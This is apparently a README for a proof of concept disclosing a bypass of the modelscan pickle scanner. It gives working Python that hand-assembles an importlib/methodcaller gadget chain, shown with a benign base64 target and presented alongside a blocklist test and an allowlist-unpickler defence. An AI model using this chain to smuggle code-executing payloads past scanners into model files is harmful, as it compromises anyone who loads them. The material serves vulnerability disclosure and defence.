---
language: en
tags:
  - security-research
  - proof-of-concept
license: mit
---

Security Research PoC — modelscan bypass

This repository contains a proof-of-concept model file demonstrating a bypass of ProtectAI's modelscan scanner.

DO NOT load untrusted model files. The model file in this repository executes arbitrary code as soon as it is unpickled, whether through pickle.load directly or through a framework loader that unpickles internally.

Vulnerability

The pickle payload uses importlib.import_module combined with operator.methodcaller to achieve code execution: import_module turns a string constant stored in the pickle into a module object, and methodcaller then invokes a named attribute of that object with attacker-chosen arguments. The only globals the pickle references are importlib.import_module and operator.methodcaller, and neither module is in modelscan's unsafe_globals blocklist. The target module name and function name never appear as globals; to the scanner they are opaque string data.
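To make the mechanism concrete, the following is an added example written for this README; it is not the repository's PoC file and not code from modelscan. It hand-assembles the same gadget chain with a benign target (base64.b64decode, an assumed stand-in for the real payload), lists the GLOBAL references an opcode-level scanner sees, runs an assumed representative blocklist over them (not modelscan's exact unsafe_globals table), and then shows an allowlist-based find_class refusing the same bytes.

```python
"""Gadget chain from the README with a benign target, plus the scanner's-eye
view and an allowlist defence. Added illustration; not the repository's PoC
file and not modelscan's code. BLOCKLIST is an assumed, representative set of
module names, not modelscan's exact unsafe_globals table.
"""
import io
import pickle
import pickletools


def _text(s: str) -> bytes:
    # UNICODE opcode: raw-unicode-escape text terminated by a newline.
    return pickle.UNICODE + s.encode("raw-unicode-escape") + b"\n"


def build_payload(module_name: str, method: str, arg: str) -> bytes:
    """Hand-assemble a protocol-2 pickle that evaluates
    operator.methodcaller(method, arg)(importlib.import_module(module_name)).

    The only GLOBAL references are operator.methodcaller and
    importlib.import_module; module_name is just a string constant, so a
    scanner keyed on referenced module names never sees it.
    """
    return b"".join([
        pickle.PROTO, b"\x02",
        # stack after this group: [methodcaller(method, arg)]
        pickle.GLOBAL, b"operator\nmethodcaller\n",
        pickle.MARK, _text(method), _text(arg), pickle.TUPLE, pickle.REDUCE,
        # stack after this group: [methodcaller(...), <module module_name>]
        pickle.GLOBAL, b"importlib\nimport_module\n",
        pickle.MARK, _text(module_name), pickle.TUPLE, pickle.REDUCE,
        # wrap the module in a 1-tuple and call methodcaller(...)(module)
        pickle.TUPLE1, pickle.REDUCE,
        pickle.STOP,
    ])


def referenced_globals(payload: bytes) -> list:
    """What an opcode-level scanner sees: the (module, name) pairs of GLOBAL
    opcodes. STACK_GLOBAL (protocol 4+) takes its operands from the stack and
    is deliberately not handled here; the constructed payload does not use it."""
    refs = []
    for op, arg, _pos in pickletools.genops(payload):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            refs.append((module, name))
    return refs


# Assumed, representative blocklist; modelscan's real table differs in detail.
BLOCKLIST = {"os", "posix", "nt", "subprocess", "sys", "builtins",
             "__builtin__", "runpy", "socket", "pty", "shutil"}


def blocklist_flags(payload: bytes) -> bool:
    """Blocklist-style check: True only if a referenced module is on the list."""
    return any(module in BLOCKLIST for module, _ in referenced_globals(payload))


def unrestricted_loads(payload: bytes):
    """Plain pickle.loads: what happens when the file is loaded without a
    restricted unpickler."""
    return pickle.loads(payload)


class AllowlistUnpickler(pickle.Unpickler):
    """Allowlist-style defence: only globals a model file legitimately needs
    resolve; everything else, importlib and operator included, is refused."""
    ALLOWED = {("collections", "OrderedDict")}  # extend per framework

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing global {module}.{name}")


def allowlist_rejects(payload: bytes) -> bool:
    """True if the allowlist unpickler refuses to load the payload."""
    try:
        AllowlistUnpickler(io.BytesIO(payload)).load()
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    p = build_payload("base64", "b64decode", "aGVsbG8=")
    print(referenced_globals(p))  # [('operator', 'methodcaller'), ('importlib', 'import_module')]
    print(blocklist_flags(p))     # False: nothing on the list was referenced
    print(unrestricted_loads(p))  # b'hello': the chained call ran anyway
    print(allowlist_rejects(p))   # True
```

The module name only ever appears as a string constant, so the blocklist check passes while pickle.loads still executes the chained call; the allowlist unpickler refuses at the first GLOBAL it does not recognise. Swap the three strings for any module, attribute and argument and the scanner's verdict does not change, which is the point of the Impact section below.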

Impact

Any pickle-based model file (.pkl, .bin, .pt, .pth, .ckpt) can carry this payload past modelscan and execute arbitrary code when loaded. The fundamental issue is that blocking individual modules (os, subprocess, etc.) is insufficient when importlib.import_module can import any module at runtime from a string the scanner never inspects. Adding importlib and operator to the blocklist closes this particular chain but not the class of bug: any callable that resolves a name from data it is given is an equivalent gadget. A durable defence is an allowlist of the globals a model file legitimately needs, enforced in Unpickler.find_class, or a serialization format that carries no code, such as safetensors.

Tested Against

modelscan 0.7.6, the latest pip release at the time of writing. Later releases may extend the blocklist; re-run the scan against the version you actually deploy before relying on this result.